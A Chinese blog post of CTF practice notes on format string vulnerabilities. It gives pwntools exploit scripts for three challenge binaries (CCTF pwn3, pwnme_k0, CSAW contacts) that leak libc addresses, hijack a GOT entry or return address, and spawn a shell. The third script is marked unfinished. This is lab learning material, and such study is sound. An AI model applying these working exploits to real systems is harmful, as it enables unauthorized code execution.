ctfwiki format string 练习

发表于2020-11-01更新于2021-02-17

hijack GOT

本题是2016 CCTF 中的pwn3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#coding=utf-8
from pwn import *
context(arch='i386',os='linux',log_level='debug')

myelf = ELF('./pwn3')
myproc = process(myelf.path)

def get_1(name):
    myproc.recvuntil('ftp>')
    myproc.sendline('get')
    myproc.recvuntil('get:')
    myproc.sendline(name)
    data = myproc.recv()
    return data

def put_2(name,content):
    myproc.recvuntil('ftp>')
    myproc.sendline('put')
    myproc.recvuntil('upload:')
    myproc.sendline(name)
    myproc.recvuntil('the content:')
    myproc.sendline(content)

def dir_3():
    myproc.recvuntil('ftp>')
    myproc.sendline('dir')

myproc.recvuntil('Rainism):')
myproc.sendline('rxraclhm')

puts_got = myelf.got['puts']
log.warn('#####puts_got addr: 0x%x#####' % puts_got)
input1 = '%8$s' + p32(puts_got) + '%7$x'
put_2('aaaa',input1)
###
###gdb.attach(myproc,"b printf")
###
puts_addr = u32(get_1('aaaa')[:4])

log.warn('#####puts addr: 0x%x#####' % puts_addr)

puts_libc_offset = 0x5f150
sys_libc_offset = 0x3a950

libc_base = puts_addr - puts_libc_offset
sys_addr = libc_base + sys_libc_offset

log.warn('#####libc_base addr: 0x%x#####' % libc_base)
log.warn('#####sys_addr addr: 0x%x#####' % sys_addr)
##
payload = fmtstr_payload(7, {puts_got: sys_addr})

myproc.sendline('put')
myproc.recvuntil('upload:')
myproc.sendline("/bin/sh;")
myproc.recvuntil('the content:')
myproc.sendline(payload)

get_1('/bin/sh;')

myproc.sendline('dir')

myproc.interactive()

hijack retaddr

本题是三个白帽的pwnme_k0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#coding=utf-8
from pwn import *
context(arch='amd64',os="linux",log_level="debug")

myelf = ELF("./pwnme_k0")
myproc = process(myelf.path)

myproc.recvuntil("Input your username(max lenth:20): ")
myproc.sendline("name")
myproc.recvuntil("Input your password(max lenth:20): ")
passwd = '%6$p'
myproc.sendline(passwd)

##
##gdb.attach(myproc,"b *0x400b39")
##
myproc.recvuntil('>')
myproc.sendline(str(1))
myproc.recvuntil("0x")

data = myproc.recvline().strip()
stack_addr = int(data,16)
ret_stack = stack_addr - 0x38

##将栈上的返回地址覆盖成提权gadget
myproc.recvuntil('>')
myproc.sendline(str(2))
myproc.recvuntil("please input new username(max lenth:20): ")
myproc.sendline(p64(ret_stack))
myproc.recvuntil("please input new password(max lenth:20): ")
myproc.sendline("%2218c%8$hn")

##
myproc.recvuntil('>')
myproc.sendline(str(1))

myproc.interactive()

堆上的格式化字符串漏洞

本题是2015年CSAW中的 contacts

(这个题还没调完,后来有别的事去了,先放一下)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#coding=utf-8
from pwn import *

context(arch='i386',os='linux',log_level='debug')

myelf = ELF('./contacts')
myproc = process(myelf.path)

def Create(c_name,c_phone,c_len,c_desp):
    myproc.recvuntil('>>> ')
    myproc.sendline(str(1))
    myproc.recvuntil("Contact info: ")
    myproc.recvuntil("\tName: ")
    myproc.sendline(c_name)
    myproc.recvuntil("\tEnter Phone No: ")
    myproc.sendline(c_phone)
    myproc.recvuntil("\tLength of description: ")
    myproc.sendline(c_len)
    myproc.recvuntil("\tEnter description:\n\t\t")
    myproc.sendline(c_desp)

def Display():
    myproc.recvuntil('>>> ')
    myproc.sendline(str(4))
    myproc.recvuntil("\tDescription: ")

Create('aaaaaaaa','1234567891',str(50),'%31$paaaa')

Display()
data = myproc.recvuntil('aaaa',drop=True)
libc_start_main = int(data,16) - 247
log.warn("a: 0x%x" % libc_start_main)
libc_base = libc_start_main - 0x18550
log.warn("b: 0x%x" % libc_base)
sys_addr = libc_base + 0x3a950
binsh_addr = libc_base + 0x15910b


payload = flat([sys_addr,'aaaa',binsh_addr,'%6$p%11$pbbbb'])
gdb.attach(myproc,"b *0x08048c22")
Create('xxxxxxxx','2342342234',str(50),payload)
Display()
myproc.recvuntil("\tDescription: ")
data = myproc.recvuntil('bbbb',drop=True)
data = data.split('0x')
print data
ebp_addr = int(data[1],16)
heap_addr = int(data[2],16)

#payoad = '%'+str(ebp_addr-4)+'x'+'%6$n'
#part1 = (ebp_addr-4)/2
#part2 = ebp_addr-4 -part1
#payload = '%'+str(part1)+'x%'+str(part2)+'x%6$n'

payload = fmtstr_payload(6,{ebp_addr:heap_addr})
print payload

Create('eeeeeeee','1231231231',str(400),payload)
Display()

myproc.interactive()
      +------------+
      |  tag 0/1   |
      +------------+v2+76
      |len of desp |
      +------------+v2+72
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |            |
      |   Name     |
      +------------+ v2+8                     +---------+
      |   &heap1   |           +--------+     |         |
      +------------+ v2+4      |  Phone |     |  desp   |
      |   &heap2   |           |        |     |         |
      +------------+ v2        +--------+     +---------+
0x804b0a0                        heap1          heap2

0x804b088   record num

参考wp:

http://geeksspeak.github.io/blog/2015/09/21/csaw-2015-pwn250-contacts/

https://blog.osiris.cyber.nyu.edu/2015/09/28/csaw-ctf-contacts/

https://github.com/osirislab/CTF-Solutions/blob/master/CSAWCTF_2015/2015-10-03-csaw-ctf-contacts.markdown